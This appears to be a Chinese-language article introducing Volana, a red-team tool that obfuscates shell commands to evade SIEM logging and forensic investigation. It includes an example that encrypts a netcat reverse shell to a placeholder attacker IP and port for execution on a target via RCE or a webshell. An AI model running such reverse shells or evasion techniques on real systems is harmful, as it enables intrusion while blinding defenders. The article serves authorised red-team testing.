关于Volana

Volana是一款功能强大的Shell命令代码混淆工具，该工具基于Go语言开发，可以帮助广大研究人员实现对Shell命令或脚本代码的混淆处理。

在红队测试过程中，隐蔽性是非常重要的一个方面，许多基础设施会记录命令并实时将其发送到 SIEM，这使得事后清理部分本身毫无用处。Volana通过提供自己的 shell 运行时（输入你的命令，volana 会为你执行），提供一种在目标设备上执行的命令的隐蔽且简单的方法。

工具要求

Go环境

工具安装

由于该工具基于Go开发，因此我们首先需要在本地设备上安装并配置好最新版本的Go运行环境。

接下来，广大研究人员可以直接使用下列命令将该项目源码克隆至本地：

git clone https://github.com/ariary/volana.git

或者直接使用下列命令下载并安装最新的Volana发布版本：

curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

执行下列命令即可运行Volana：

./volana

volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  

volana » [command]

工具使用

volana 控制台命令：

ring：启用环形模式，即每个命令都与许多其他命令一起启动以掩盖踪迹（来自监控系统调用的解决方案）

exit：退出 volana 控制台

非交互式shell使用

假设您有一个非交互式 shell（例如webshell），您就可以使用encrypt或decrypt子命令了。不过在此之前，您需要配置并使用嵌入式加密密钥进行volana的代码构建。

在测试人员设备傻姑娘执行下列命令：

make build.volana-with-encryption

volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"

>>> ENCRYPTED COMMAND

复制加密的命令，并在目标机器上使用 rce 执行它

./volana decr [encrypted_command]

注意事项

为什么不直接使用“echo [command] | base64”来隐藏命令，然后在目标设备上使用“echo [encoded_command] | base64 -d | bash”来解码呢？

因为我们希望受到保护，免受触发base64使用警报或在命令中寻找 base64 文本的系统的影响。我们还想让调查变得困难，而 base64 并不是真正的阻碍。

许可证协议

本项目的开发与发布遵循Unlicense开源许可协议。

项目地址

Volana：【GitHub传送门】

参考资料

https://github.com/annmuor/zn2021_8ways

https://github.com/mufeedvh/moonwalk